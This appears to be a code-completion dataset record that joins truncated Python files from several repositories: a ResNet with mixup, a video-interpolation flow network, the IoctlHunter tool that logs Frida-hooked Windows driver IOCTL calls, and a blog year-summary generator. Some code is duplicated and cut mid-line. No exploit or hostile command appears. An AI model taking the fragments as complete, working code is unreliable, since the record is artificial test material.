def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None, avg_downsample=False):
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
self.avg_downsample = avg_downsample
self.avgpool = nn.AvgPool2d(2, stride=2, ceil_mode=True)
self.pad = (0, 0, 0, 0, (planes - inplanes) // 2, (planes - inplanes) // 2)
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
if self.avg_downsample:
x = self.avgpool(x)
identity = nn.functional.pad(x, self.pad)
else:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None, avg_downsample=False):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.num_classes = num_classes
self.dilation = 1
self.avg_downsample = avg_downsample
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if avg_downsample:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=1, padding=3, bias=False)
else:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes,bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer, self.avg_downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x, target=None, mix_type="vanilla", mixup_alpha=None, num_base_classes=-1,
use_hard_positive_aug=False, add_noise_level=0., mult_noise_level=0., minimum_lambda=0.5,
hpa_type="none", label_sharpening=True, label_mix="vanilla", label_mix_threshold=0.2,
exp_coef=1., cutmix_prob=1., num_similar_class=3, classifiers=None,
gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):
if "mixup_hidden" in mix_type:
layer_mix = random.randint(0, 3)
else:
layer_mix = None
out = x
if mixup_alpha is not None:
lam = get_lambda(mixup_alpha)
# https://github.com/YU1ut/MixMatch-pytorch/blob/master/train.py#L243
if use_hard_positive_aug:
lam = max(lam, 1 - lam)
lam = max(lam, minimum_lambda)
lam = torch.from_numpy(np.array([lam]).astype('float32')).cuda()
lam = Variable(lam)
if target is not None:
target_reweighted = to_one_hot(target, self.num_classes)
if layer_mix == 0: | out, target_reweighted, mix_label_mask = middle_mixup_process(out, target_reweighted, num_base_classes, | 1 | 2023-10-25 16:50:51+00:00 | 4k |
megvii-research/WACV2024-SAFA | model/flownet.py | [
{
"identifier": "warp",
"path": "model/warplayer.py",
"snippet": "def warp(tenInput, tenFlow, mode='bilinear'):\n k = (str(tenFlow.device), str(tenFlow.size()))\n if k not in backwarp_tenGrid:\n tenHorizontal = torch.linspace(-1.0, 1.0, tenFlow.shape[3]).view(1, 1, 1, tenFlow.shape[3]).expand(tenFlow.shape[0], -1, tenFlow.shape[2], -1)\n tenVertical = torch.linspace(-1.0, 1.0, tenFlow.shape[2]).view(1, 1, tenFlow.shape[2], 1).expand(tenFlow.shape[0], -1, -1, tenFlow.shape[3])\n backwarp_tenGrid[k] = torch.cat([ tenHorizontal, tenVertical ], 1).to(device)\n\n tenFlow = torch.cat([ tenFlow[:, 0:1, :, :] / ((tenInput.shape[3] - 1.0) / 2.0), tenFlow[:, 1:2, :, :] / ((tenInput.shape[2] - 1.0) / 2.0) ], 1)\n\n g = (backwarp_tenGrid[k] + tenFlow).permute(0, 2, 3, 1)\n return torch.nn.functional.grid_sample(input=tenInput, grid=g, mode=mode, padding_mode='border', align_corners=True)"
},
{
"identifier": "Head",
"path": "model/head.py",
"snippet": "class Head(nn.Module):\n def __init__(self, c):\n super(Head, self).__init__()\n model = models.resnet18(pretrained=False)\n self.cnn0 = nn.Sequential(*nn.ModuleList(model.children())[:3])\n self.cnn1 = nn.Sequential(\n *list(model.children())[3:5],\n )\n self.cnn2 = nn.Sequential(\n *list(model.children())[5:6],\n )\n self.out0 = nn.Conv2d(64, c, 1, 1, 0)\n self.out1 = nn.Conv2d(64, c, 1, 1, 0)\n self.out2 = nn.Conv2d(128, c, 1, 1, 0)\n self.normalize = MeanShift([0.485, 0.456, 0.406], [0.229, 0.224, 0.225], norm=True).to(device) \n def forward(self, x):\n x = self.normalize(x)\n f0 = self.cnn0(x)\n f1 = self.cnn1(f0)\n f2 = self.cnn2(f1)\n f0 = self.out0(f0)\n f1 = F.interpolate(self.out1(f1), scale_factor=2.0, mode=\"bilinear\")\n f2 = F.interpolate(self.out2(f2), scale_factor=4.0, mode=\"bilinear\")\n return f0 + f1 + f2"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
from model.warplayer import warp
from model.head import Head | 1,723 |
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=True, groups=groups),
nn.PReLU(out_planes)
)
def conv_bn(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes),
nn.PReLU(out_planes)
)
class Resblock(nn.Module):
def __init__(self, c, dilation=1):
super(Resblock, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
nn.PReLU(c),
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
)
self.beta = nn.Parameter(torch.zeros((1, c, 1, 1)), requires_grad=True)
self.prelu = nn.PReLU(c)
def forward(self, x):
y = self.conv(x)
return self.prelu(y * self.beta + x)
class RoundSTE(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = torch.bernoulli(x)
return y
@staticmethod
def backward(ctx, grad):
return grad, None
class RecurrentBlock(nn.Module):
def __init__(self, c, dilation=1, depth=6):
super(RecurrentBlock, self).__init__()
self.conv_stem = conv(3*c+6+1, c, 3, 1, 1, groups=1)
self.conv_backbone = torch.nn.ModuleList([])
self.depth = depth
for i in range(depth):
self.conv_backbone.append(Resblock(c, dilation))
def forward(self, x, i0, i1, flow, timestep, convflow, getscale):
flow_down = F.interpolate(flow, scale_factor=0.5, mode="bilinear")
i0 = warp(i0, flow_down[:, :2] * 0.5)
i1 = warp(i1, flow_down[:, 2:4] * 0.5)
x = torch.cat((x, flow_down, i0, i1, timestep), 1)
scale = RoundSTE.apply(getscale(x)).unsqueeze(2).unsqueeze(3)
feat = 0
if scale.shape[0] != 1 or (scale[:, 0:1].mean() >= 0.5 and scale[:, 1:2].mean() >= 0.5):
x0 = self.conv_stem(x)
for i in range(self.depth):
x0 = self.conv_backbone[i](x0)
feat = feat + x0 * scale[:, 0:1] * scale[:, 1:2]
if scale.shape[0] != 1 or (scale[:, 0:1].mean() < 0.5 and scale[:, 1:2].mean() >= 0.5):
x1 = self.conv_stem(F.interpolate(x, scale_factor=0.5, mode="bilinear"))
for i in range(self.depth):
x1 = self.conv_backbone[i](x1)
feat = feat + F.interpolate(x1, scale_factor=2.0, mode="bilinear") * (1 - scale[:, 0:1]) * scale[:, 1:2]
if scale.shape[0] != 1 or scale[:, 1:2].mean() < 0.5:
x2 = self.conv_stem(F.interpolate(x, scale_factor=0.25, mode="bilinear"))
for i in range(self.depth):
x2 = self.conv_backbone[i](x2)
feat = feat + F.interpolate(x2, scale_factor=4.0, mode="bilinear") * (1 - scale[:, 1:2])
return feat, convflow(feat) + flow, i0, i1, scale
class Flownet(nn.Module):
def __init__(self, block_num, c=64):
super(Flownet, self).__init__()
|
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=True, groups=groups),
nn.PReLU(out_planes)
)
def conv_bn(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes),
nn.PReLU(out_planes)
)
class Resblock(nn.Module):
def __init__(self, c, dilation=1):
super(Resblock, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
nn.PReLU(c),
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
)
self.beta = nn.Parameter(torch.zeros((1, c, 1, 1)), requires_grad=True)
self.prelu = nn.PReLU(c)
def forward(self, x):
y = self.conv(x)
return self.prelu(y * self.beta + x)
class RoundSTE(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = torch.bernoulli(x)
return y
@staticmethod
def backward(ctx, grad):
return grad, None
class RecurrentBlock(nn.Module):
def __init__(self, c, dilation=1, depth=6):
super(RecurrentBlock, self).__init__()
self.conv_stem = conv(3*c+6+1, c, 3, 1, 1, groups=1)
self.conv_backbone = torch.nn.ModuleList([])
self.depth = depth
for i in range(depth):
self.conv_backbone.append(Resblock(c, dilation))
def forward(self, x, i0, i1, flow, timestep, convflow, getscale):
flow_down = F.interpolate(flow, scale_factor=0.5, mode="bilinear")
i0 = warp(i0, flow_down[:, :2] * 0.5)
i1 = warp(i1, flow_down[:, 2:4] * 0.5)
x = torch.cat((x, flow_down, i0, i1, timestep), 1)
scale = RoundSTE.apply(getscale(x)).unsqueeze(2).unsqueeze(3)
feat = 0
if scale.shape[0] != 1 or (scale[:, 0:1].mean() >= 0.5 and scale[:, 1:2].mean() >= 0.5):
x0 = self.conv_stem(x)
for i in range(self.depth):
x0 = self.conv_backbone[i](x0)
feat = feat + x0 * scale[:, 0:1] * scale[:, 1:2]
if scale.shape[0] != 1 or (scale[:, 0:1].mean() < 0.5 and scale[:, 1:2].mean() >= 0.5):
x1 = self.conv_stem(F.interpolate(x, scale_factor=0.5, mode="bilinear"))
for i in range(self.depth):
x1 = self.conv_backbone[i](x1)
feat = feat + F.interpolate(x1, scale_factor=2.0, mode="bilinear") * (1 - scale[:, 0:1]) * scale[:, 1:2]
if scale.shape[0] != 1 or scale[:, 1:2].mean() < 0.5:
x2 = self.conv_stem(F.interpolate(x, scale_factor=0.25, mode="bilinear"))
for i in range(self.depth):
x2 = self.conv_backbone[i](x2)
feat = feat + F.interpolate(x2, scale_factor=4.0, mode="bilinear") * (1 - scale[:, 1:2])
return feat, convflow(feat) + flow, i0, i1, scale
class Flownet(nn.Module):
def __init__(self, block_num, c=64):
super(Flownet, self).__init__() | self.convimg = Head(c) | 1 | 2023-10-26 09:24:29+00:00 | 4k |
Z4kSec/IoctlHunter | ioctl_hunter/lib/hooking.py | [
{
"identifier": "State",
"path": "ioctl_hunter/lib/state.py",
"snippet": "class State:\n results = Results()\n\n script = None\n cur_proc = None\n\n quiet = False\n running = True\n hook_enabled = False\n debug_enabled = False\n hex_out_enabled = False\n\n included_drivers = []\n only_driver_handles = True"
},
{
"identifier": "get_ioctl_code_details",
"path": "ioctl_hunter/utils/misc.py",
"snippet": "def get_ioctl_code_details(ioctl_code):\n int_ioctl_code = int(ioctl_code)\n device = (int_ioctl_code >> 16) & 0xFFFF\n access = (int_ioctl_code >> 14) & 3\n function = (int_ioctl_code) >> 2 & 0xFFF\n method = int_ioctl_code & 3\n return hex(device), hex(access), hex(function), hex(method)"
},
{
"identifier": "get_hex_from_hexdump",
"path": "ioctl_hunter/utils/misc.py",
"snippet": "def get_hex_from_hexdump(hexdump):\n hex = \"\"\n for chunck in hexdump.split(\"\\n\")[1:]:\n hex += chunck[12:][:47].replace(\" \", \"\")\n return hex"
},
{
"identifier": "get_frida_script_content",
"path": "ioctl_hunter/utils/misc.py",
"snippet": "def get_frida_script_content():\n script_path = resource_filename(\"ioctl_hunter.frida\", \"script.ts\")\n f = open(script_path, mode=\"r\")\n script_content = f.read()\n f.close()\n return script_content"
},
{
"identifier": "print_ioctl",
"path": "ioctl_hunter/ui/display.py",
"snippet": "def print_ioctl(my_dict):\n if State.debug_enabled:\n return False\n\n logger.result(\"\")\n logger.result(\"-\" * 20)\n logger.result(\"\")\n\n logger.result(f\"Symbol:\\t\\t{my_dict['symbol']}\")\n logger.result(f\"Device path:\\t{my_dict['handle_path']}\")\n logger.result(\n f\"Device handle:\\t{my_dict['handle_device']['dec']}\\t({my_dict['handle_device']['hex']})\"\n )\n\n logger.result(\n f\"Ioctl code:\\t\\t{my_dict['ioctl']['dec']}\\t({my_dict['ioctl']['hex']})\"\n )\n logger.result(f\"\\t- Device:\\t{my_dict['ioctl']['details']['device']}\")\n logger.result(f\"\\t- Access:\\t{my_dict['ioctl']['details']['access']}\")\n logger.result(f\"\\t- Function:\\t{my_dict['ioctl']['details']['function']}\")\n logger.result(f\"\\t- Method:\\t{my_dict['ioctl']['details']['method']}\")\n\n logger.result(f\"Input buffer size:\\t{my_dict['buff_in']['size']}\")\n logger.result(f\"Hexdump input buffer:\\n{my_dict['buff_in']['hexdump']}\")\n\n logger.result(f\"Output buffer size:\\t{my_dict['buff_out']['size']}\")\n logger.result(f\"Returned bytes:\\t{my_dict['buff_out']['bytes_returned']}\")\n if State.hex_out_enabled:\n logger.result(f\"Hexdump output buffer:\\n{my_dict['buff_out']['hexdump']}\")\n logger.result(\"\")\n logger.result(\"-\" * 20)\n logger.result(\"\")\n return True"
},
{
"identifier": "print_loaded_driver",
"path": "ioctl_hunter/ui/display.py",
"snippet": "def print_loaded_driver(loaded_driver):\n if State.debug_enabled:\n return False\n logger.warning(\"\")\n logger.warning(\"-\" * 30)\n logger.warning(\"\")\n logger.warning(f\"New dynamically loaded driver:\")\n logger.warning(f\"\\t- SvcName:\\t{loaded_driver['name']}\")\n logger.warning(f\"\\t- RegKey:\\t{loaded_driver['key']}\")\n logger.warning(f\"\\t- ImagePath:\\t{loaded_driver['image_path']}\")\n logger.warning(\"\")\n logger.warning(\"-\" * 30)\n logger.warning(\"\")\n return True"
},
{
"identifier": "print_final_recap",
"path": "ioctl_hunter/ui/display.py",
"snippet": "def print_final_recap():\n logger.info(\"\")\n logger.info(\"\")\n print_enable_debugger()\n logger.info(\"\")\n logger.info(\"\")\n logger.info(\"End of the hunt !\")\n logger.info(\"Exiting...\")"
}
] | import ast
import time
import frida
import psutil
import logging
import datetime
from urllib.parse import unquote
from .state import State
from ..utils.misc import (
get_ioctl_code_details,
get_hex_from_hexdump,
get_frida_script_content,
)
from ..ui.display import print_ioctl, print_loaded_driver, print_final_recap | 1,785 |
logger = logging.getLogger("ioctl-hunter")
def check_drivers_filters(ioctl_dict):
if State.results.included_drivers:
for driver in State.results.included_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
return False
ret = False
if State.results.excluded_drivers:
for driver in State.results.excluded_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
ret = True
break
return ret
def check_ioctls_filters(ioctl_dict):
if (
State.results.included_ioctls
and ioctl_dict["ioctl"] in State.results.included_ioctls
):
return False
if (
State.results.excluded_ioctls
and ioctl_dict["ioctl"] in State.results.excluded_ioctls
):
return True
return False
def process_device_ioctl_queue():
ioctls_queue = State.script.exports.getQueueDeviceIoctl()
open_handles = State.script.exports.getOpenHandles()
for ioctl_elem in ioctls_queue:
ioctl_dict = ioctl_elem
try:
ioctl_dict = ast.literal_eval(ioctl_elem)
except:
try:
ioctl_dict = ast.literal_eval(
ioctl_elem.replace("\\", "\\\\").replace("\n", "\\n")
)
except Exception as e:
logger.error(str(e))
logger.error(ioctl_elem)
continue
ioctl_dict["timestamp"] = str(datetime.datetime.now())
ioctl_dict["handle_device"] = {
"dec": ioctl_dict["handle_device"],
"hex": "{0:#010x}".format(int(ioctl_dict["handle_device"])),
}
if ioctl_dict["handle_path"]:
pass
elif open_handles.get(ioctl_dict["handle_device"]["dec"], None):
ioctl_dict["handle_path"] = open_handles.get(
ioctl_dict["handle_device"]["dec"]
)
else:
logger.error(open_handles)
ioctl_dict["handle_path"] = "N/A"
if check_drivers_filters(ioctl_dict):
continue
if check_ioctls_filters(ioctl_dict):
continue
device, access, function, method = get_ioctl_code_details(ioctl_dict["ioctl"])
ioctl_dict["ioctl"] = {
"dec": ioctl_dict["ioctl"],
"hex": "{0:#010x}".format(int(ioctl_dict["ioctl"])),
"details": {
"device": device,
"access": access,
"function": function,
"method": method,
},
}
ioctl_dict["buff_in"]["hexdump"] = unquote(ioctl_dict["buff_in"]["hexdump"])
ioctl_dict["buff_in"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_in"]["hexdump"]
)
ioctl_dict["buff_out"]["hexdump"] = unquote(ioctl_dict["buff_out"]["hexdump"])
ioctl_dict["buff_out"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_out"]["hexdump"]
)
print_ioctl(ioctl_dict)
State.results.add_ioctl(ioctl_dict)
return True
def process_loaded_drivers_queue():
loaded_drivers_queue = State.script.exports.getQueueLoadedDrivers()
if loaded_drivers_queue:
for loaded_driver in loaded_drivers_queue:
loaded_driver["timestamp"] = str(datetime.datetime.now())
State.results.add_loaded_driver(loaded_driver)
|
logger = logging.getLogger("ioctl-hunter")
def check_drivers_filters(ioctl_dict):
if State.results.included_drivers:
for driver in State.results.included_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
return False
ret = False
if State.results.excluded_drivers:
for driver in State.results.excluded_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
ret = True
break
return ret
def check_ioctls_filters(ioctl_dict):
if (
State.results.included_ioctls
and ioctl_dict["ioctl"] in State.results.included_ioctls
):
return False
if (
State.results.excluded_ioctls
and ioctl_dict["ioctl"] in State.results.excluded_ioctls
):
return True
return False
def process_device_ioctl_queue():
ioctls_queue = State.script.exports.getQueueDeviceIoctl()
open_handles = State.script.exports.getOpenHandles()
for ioctl_elem in ioctls_queue:
ioctl_dict = ioctl_elem
try:
ioctl_dict = ast.literal_eval(ioctl_elem)
except:
try:
ioctl_dict = ast.literal_eval(
ioctl_elem.replace("\\", "\\\\").replace("\n", "\\n")
)
except Exception as e:
logger.error(str(e))
logger.error(ioctl_elem)
continue
ioctl_dict["timestamp"] = str(datetime.datetime.now())
ioctl_dict["handle_device"] = {
"dec": ioctl_dict["handle_device"],
"hex": "{0:#010x}".format(int(ioctl_dict["handle_device"])),
}
if ioctl_dict["handle_path"]:
pass
elif open_handles.get(ioctl_dict["handle_device"]["dec"], None):
ioctl_dict["handle_path"] = open_handles.get(
ioctl_dict["handle_device"]["dec"]
)
else:
logger.error(open_handles)
ioctl_dict["handle_path"] = "N/A"
if check_drivers_filters(ioctl_dict):
continue
if check_ioctls_filters(ioctl_dict):
continue
device, access, function, method = get_ioctl_code_details(ioctl_dict["ioctl"])
ioctl_dict["ioctl"] = {
"dec": ioctl_dict["ioctl"],
"hex": "{0:#010x}".format(int(ioctl_dict["ioctl"])),
"details": {
"device": device,
"access": access,
"function": function,
"method": method,
},
}
ioctl_dict["buff_in"]["hexdump"] = unquote(ioctl_dict["buff_in"]["hexdump"])
ioctl_dict["buff_in"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_in"]["hexdump"]
)
ioctl_dict["buff_out"]["hexdump"] = unquote(ioctl_dict["buff_out"]["hexdump"])
ioctl_dict["buff_out"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_out"]["hexdump"]
)
print_ioctl(ioctl_dict)
State.results.add_ioctl(ioctl_dict)
return True
def process_loaded_drivers_queue():
loaded_drivers_queue = State.script.exports.getQueueLoadedDrivers()
if loaded_drivers_queue:
for loaded_driver in loaded_drivers_queue:
loaded_driver["timestamp"] = str(datetime.datetime.now())
State.results.add_loaded_driver(loaded_driver) | print_loaded_driver(loaded_driver) | 5 | 2023-10-31 22:38:36+00:00 | 4k |
7Wate/EndOfYear | main.py | [
{
"identifier": "const",
"path": "src/const.py",
"snippet": "SITE_NAME = \"EndOfYear\"\nSITE_SERVICE_WEB = 1\nSITE_SERVICE_STATIC = 0\nTIME_ZONE = \"Asia/Shanghai\"\nFORMAT_TIME = \"%Y-%m-%d %H:%M:%S\"\nBLOG_POST_CATEGORY_LIFE = 1\nBLOG_POST_CATEGORY_TECH = 2\nBLOG_MAX_KEYS = 7\nLUNAR_HOLIDAYS = {\n (1, 1): '春节',\n (1, 15): '元宵节',\n (2, 2): '龙抬头',\n (5, 5): '端午节',\n (7, 7): '七夕节',\n (7, 15): '中元节',\n (8, 15): '中秋节',\n (9, 9): '重阳节',\n (12, 8): '腊八节',\n (12, 23): '小年',\n (12, 30): '除夕'\n}\nSOLAR_HOLIDAYS = {\n (1, 1): '元旦',\n (2, 14): '情人节',\n (3, 8): '妇女节',\n (4, 4): '清明节',\n (5, 1): '劳动节',\n (10, 1): '国庆节',\n (12, 13): '南京大屠杀纪念日',\n (9, 18): '九一八事变纪念日',\n (12, 7): '南京保卫战胜利纪念日',\n (8, 15): '抗日战争胜利纪念日'\n}"
},
{
"identifier": "models",
"path": "src/models.py",
"snippet": "class Site:\nclass Blog:\nclass Post:\nclass Custom:\n def to_dict(self) -> dict:\n def to_dict(self) -> dict:\n def to_dict(self) -> dict:\n def to_dict(self) -> dict:"
},
{
"identifier": "tools",
"path": "src/tools.py",
"snippet": "def check_website_status(url):\ndef get_domain(url):\ndef get_domain_life(url):\ndef remove_html_tags(text):\ndef get_yiyan():\ndef get_multiple_of_100(string):\ndef format_datetime(dt_str):"
},
{
"identifier": "Config",
"path": "src/config.py",
"snippet": "class Config:\n def __init__(self, path):\n \"\"\"\n 初始化配置文件 config.ini\n :param path:文件路径\n \"\"\"\n if not os.path.isfile(path):\n logger.error(f\"配置文件 {path} 不存在或不是一个文件\")\n raise FileNotFoundError\n\n self.path = path\n self.config = configparser.ConfigParser()\n\n try:\n self.config.read(self.path)\n except configparser.ParsingError as e:\n logger.error(f\"解析配置文件 {self.path} 错误: {str(e)}\")\n raise\n\n except PermissionError as e:\n logger.error(f\"没有权限读取配置文件 {self.path}: {str(e)}\")\n raise\n\n @property\n def rss_url(self):\n try:\n url = self.config.get('blog', 'rss', fallback=None)\n except configparser.NoSectionError:\n logger.error('未找到 blog 配置项,请检查拼写')\n return None\n\n if not url:\n logger.debug('rss 文件配置值为空,尝试读取环境变量')\n url = os.environ.get('rss')\n if url is None:\n logger.error('rss 文件配置值为空,环境变量为空……')\n return None\n\n # 如果网址不可访问,返回 None\n if not check_website_status(url):\n logger.error(f\"rss URL {url} 不可访问\")\n return None\n\n return url\n\n @property\n def rss_domain(self):\n rss_url = self.rss_url\n\n if rss_url is None:\n return None\n\n parsed = urlparse(rss_url)\n domain_parts = parsed.netloc.split('.')\n\n if len(domain_parts) < 2:\n logger.error(f\"提供的 URL {rss_url} 的域名格式错误\")\n return None\n\n return '.'.join(domain_parts[-2:])\n\n @property\n def web_status(self):\n try:\n web_status = self.config.get('default', 'web', fallback=None)\n except configparser.NoSectionError:\n logger.error('未找到 web 配置项,请检查拼写')\n return None\n\n if web_status is None:\n logger.error('web 配置值为空')\n return const.SITE_SERVICE_WEB\n\n if web_status == \"True\" or web_status == \"true\" or web_status == \"t\" or web_status == \"T\":\n return const.SITE_SERVICE_WEB\n\n if web_status == \"False\" or web_status == \"false\" or web_status == \"f\" or web_status == \"F\":\n return const.SITE_SERVICE_STATIC"
},
{
"identifier": "Generator",
"path": "src/generator.py",
"snippet": "class Generator:\n\n def __init__(self, rss):\n \"\"\"\n 初始化Generator类\n :param rss: RSS链接\n \"\"\"\n try:\n self._my_blog = scraper.Blog(rss)\n logger.debug(self._my_blog)\n for i, post in enumerate(self._my_blog.post_lists, 1):\n logger.info(f\"Post #{i}:\")\n logger.info(post)\n except Exception as e:\n logger.error(f\"Generator 无法创建 Blog 对象: {str(e)}\")\n\n def blog(self):\n \"\"\"\n 获取博客信息\n :return: Blog字典\n \"\"\"\n return models.Blog(\n name=self._my_blog.title,\n link=self._my_blog.link,\n life=self._my_blog.life,\n article_count=self._my_blog.article_count,\n article_word_count=self._my_blog.article_word_count,\n top_post_keys=self._my_blog.keys,\n category=self._my_blog.category\n ).to_dict()\n\n def special_post(self):\n \"\"\"\n 获取特殊日期的文章\n :return: Post字典\n \"\"\"\n max_item_special_date = self._get_post_with_max(\"special_date_score\")\n return models.Post(\n title=max_item_special_date.title,\n content=max_item_special_date.content,\n keys=max_item_special_date.keys,\n time=max_item_special_date.time,\n date=max_item_special_date.date\n ).to_dict()\n\n def sentiment_post(self):\n \"\"\"\n 获取情感最优文章\n :return: Post字典\n \"\"\"\n max_item_sentiment = self._get_post_with_max(\"sentiment_score\")\n return models.Post(\n title=max_item_sentiment.title,\n content=max_item_sentiment.content,\n keys=max_item_sentiment.keys,\n time=max_item_sentiment.time,\n date=max_item_sentiment.date\n ).to_dict()\n\n def long_post(self):\n \"\"\"\n 获取最长文章数据\n :return: Post字典\n \"\"\"\n max_item_long = self._get_post_with_max(\"word_count\")\n return models.Post(\n title=max_item_long.title,\n content=max_item_long.content,\n keys=max_item_long.keys,\n time=max_item_long.time,\n date=max_item_long.date,\n ).to_dict()\n\n def short_post(self):\n \"\"\"\n 获取最短文章数据\n :return: Post字典\n \"\"\"\n max_item_short = self._get_post_with_min(\"word_count\")\n return models.Post(\n title=max_item_short.title,\n content=max_item_short.content,\n keys=max_item_short.keys,\n time=max_item_short.time,\n date=max_item_short.date,\n ).to_dict()\n\n def _get_post_with_max(self, score_attr):\n \"\"\"\n 获取具有最大属性值的文章\n :param score_attr: 属性\n :return:\n \"\"\"\n max_score = max(getattr(post, score_attr) for post in self._my_blog.post_lists)\n max_posts = [post for post in self._my_blog.post_lists if getattr(post, score_attr) == max_score]\n if max_posts:\n return 